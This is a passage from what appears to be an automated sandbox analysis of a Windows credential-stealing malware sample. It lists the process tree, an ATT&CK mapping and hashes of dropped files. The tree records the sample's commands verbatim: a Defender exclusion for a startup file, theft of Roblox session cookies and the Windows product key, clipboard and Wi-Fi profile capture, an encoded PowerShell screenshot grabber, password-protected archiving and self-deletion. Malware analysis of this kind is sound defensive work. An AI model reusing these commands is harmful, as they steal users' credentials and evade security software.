    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2288
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:904
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      PID:2788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1200
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:4232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‎.scr'"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2984
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‎.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3876
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:1304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3616
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:1924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:384
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      System Location Discovery: System Language Discovery
      PID:5108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - System Location Discovery: System Language Discovery
    PID:4632
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3688
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:3180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4516
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3744
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:4284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:5056
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4376
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      System Location Discovery: System Language Discovery
      Gathers system information
      PID:720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4252
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3060
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4816
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q4cznvee\q4cznvee.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3560
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES88A8.tmp" "c:\Users\Admin\AppData\Local\Temp\q4cznvee\CSCDBB16CCA6FD7488CBB2F8E8E9415F89C.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2052
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:1460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1340
  - - C:\Windows\SysWOW64\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:3900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1204
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:4144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3164
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3912
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:2736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4240
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      PID:936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2060
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:2996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1080
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:2464
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1340
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3536
  - - C:\Windows\SysWOW64\getmac.exe
      getmac
      4⤵
      PID:4072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4412
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI24802\rar.exe a -r -hp"abua7med1" "C:\Users\Admin\AppData\Local\Temp\vVcqY.zip" *"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3212
  - - C:\Users\Admin\AppData\Local\Temp\_MEI24802\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI24802\rar.exe a -r -hp"abua7med1" "C:\Users\Admin\AppData\Local\Temp\vVcqY.zip" *
      4⤵
      Executes dropped EXE
      PID:8
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:448
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      System Location Discovery: System Language Discovery
      PID:620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2604
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      System Location Discovery: System Language Discovery
      PID:5036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:740
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      System Location Discovery: System Language Discovery
      PID:2440
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3884
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3188
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      PID:1808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2052
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1892
  - - C:\Windows\SysWOW64\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4340

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:4516

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
0e3c5d20eeb44eec62f6b8bdc0e3fd51

SHA1
c48fdef235c3cb321d849d7bfc7b29a67474efa8

SHA256
5ae311cc8d10ba33976ef895305e71cd1a4803088fbc6ff4a1ee811ed80cc342

SHA512
10536fefdd8d47d81f50de845c6a95717f433cae0ad317f3cddc12156f462f43fe11181afc7b20b72b6e203f6670ba9dbf39a257c1a0bf5a5d5e05dfbdd1376d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
b57b892a8d4c77f3ef724200d8ebe146

SHA1
e99d17c4d1a72c343c8fecc82eb39f2f7369e2dd

SHA256
dd92df554b732acbdd90e5e5f4307c608387a4487f694920a21624dd222a2c99

SHA512
0070496d137fe9fc23bfcbaff66f7e9cd4af55b0c8b0d8616f01b548b6626b992fba69c569a460a1a0975025cf39b8e3be9aee535e1f92cf62d66c07418df121

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
